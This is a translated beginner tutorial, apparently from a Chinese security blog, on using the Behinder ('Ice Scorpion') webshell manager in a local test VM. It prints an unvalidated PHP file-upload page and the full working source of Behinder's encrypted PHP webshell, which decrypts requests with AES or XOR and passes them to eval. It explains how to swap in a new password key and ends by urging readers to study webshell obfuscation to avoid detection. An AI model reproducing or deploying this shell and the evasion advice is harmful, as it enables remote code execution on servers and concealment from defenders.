Preface
I just downloaded the latest version of Bing Scorpion 3.0 beta2 today, but I still can’t connect. Later I asked the company’s elder brother to find out the reason. Here is a record, I hope it will help you.
This article is relatively basic, mainly for novices, with low technical content and mainly for operating procedures.
First look at what files are downloaded: The
server file contains webshells in various languages, as shown below:
Environment configuration
Here I use the php webshell to do the experiment. First I opened a windows virtual machine, downloaded phpstudy, started apache, and then wrote a php code for file upload. Here is the php file upload code that comes with the rookie tutorial. The specific code is as follows:
<!-- index.html代码 -->
<html>
<head>
<meta charset="utf-8">
<title>Upload</title>
</head>
<body>
<!-- 下面表单表示将接收到底文件传给upload_file.php去处理 -->
<form action="upload_file.php" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
// upload_file.php
<?php
if ($_FILES["file"]["error"] > 0)
{
echo "错误:" . $_FILES["file"]["error"] . "<br>";
}
else
{
echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";
echo "文件类型: " . $_FILES["file"]["type"] . "<br>";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"];
}
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "upload/" . $_FILES["file"]["name"] //文件会被上传到当前目录下的upload文件夹中
?>
Put the appeal code:
This folder should be there as long as you download phpstudy. I installed it using the default directory. The uploaded file written by upload_file.php code needs to be placed in the upload folder under the current directory, so We need to create an upload folder ourselves, as shown above.
Connect webshell
The upload page is shown in the figure above, click choose file to select the file, click submit to upload our php webshell, and the following figure will appear when the upload is successful.
At this time, double-click to open our ice scorpion:
if it cannot be opened, it may be that the java version is wrong. Here I give my own java version as a reference.
After opening it as shown in the figure below:
Right-click in the blank space and click Add:
Enter url and password and click Save
Let me talk about why the default password is rebeyond and how to change the default password:
Let’s look at the source code of Bingscorp’s phpshell:
<?php
@error_reporting(0);
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
$key="e45e329feb5d925b"; //这一行为密码的md5的前16位
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{
public function __invoke($p) {
eval($p."");}}
@call_user_func(new C(),$params);
}
?>
As I marked in the code
$key="e45e329feb5d925b"; //This is the first 16 bits of the md5 of the password.
We go to the cmd5 website to perform encryption and decryption operations, and enter rebeyond:
found that the first 16 of the 32-bit md5 of rebeyond is just the key in the code The value of (is the first line md5(rebeyond,32)). Now everyone should know how to change the password. Just replace the key value in the code with the first 16 digits of the md5 of the password you want to use, and then you can use your own password to log in to the shell. For example, if you want to use admin as the password, the md5 of admin you find is as follows: At
this time, you only need to change the value of "$key="e45e329feb5d925b";" in the code to 21232f297a57a5a7 to log in using admin as the password. Speaking of this, it has been very detailed, so stop it.
Ice scorpion page
After the connection is successful, the page is as follows:
You can use it according to your needs, but I suggest you have the opportunity to study the confusion and avoidance of webshell, otherwise it is easy to be checked and killed.